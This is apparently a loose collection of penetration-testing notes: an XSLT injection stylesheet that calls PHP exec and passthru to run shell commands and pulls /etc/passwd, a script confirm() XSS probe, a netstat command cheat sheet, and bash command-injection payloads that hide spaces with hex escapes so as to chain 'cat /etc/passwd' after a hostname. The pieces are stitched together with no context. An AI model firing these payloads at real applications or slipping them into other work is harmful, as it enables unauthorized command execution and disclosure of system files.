<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<script>confirm("We're good");</script>
<!--
<xsl:value-of select="php:function('exec','id')"/>
<xsl:value-of select="php:function(‘passthru’,’ls -la /’)"/>
<xsl:copy-of select="document('/etc/passwd')"/>
<xsl:value-of select="php:function('passthru','ls -la /')"/>
-->
<xsl:value-of select="php:function('passthru','ls -la /')"/>
</xsl:template>
</xsl:stylesheet>
netstat -c –Continuous output
netstat -r –Displays routing table
netstat -ie –Network Interfaces
Displaying all Connections
netstat -a
Displaying all TCP
netstat -at
Displaying all UDP
netstat -au
Displaying all listening TCP Ports
netstat -lt
Displaying all listening UDP Ports
netstat -lu
Process Identification
netstat -p
netstat -atp –Shows service name
Displaying only listening TCP connections
netstat -tnl
Displaying only listening UDP connections
netstat -unl
Combination: netstat -nlpt –Shows process name and PID
Displaying a particular port
netstat -anp | grep:443
{echo,hello,world}
CMD=$'\x20a\x20b\x20c';echo$CMD
CMD=$'\x20a\x20b\x20c'&&echo$CMD
google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD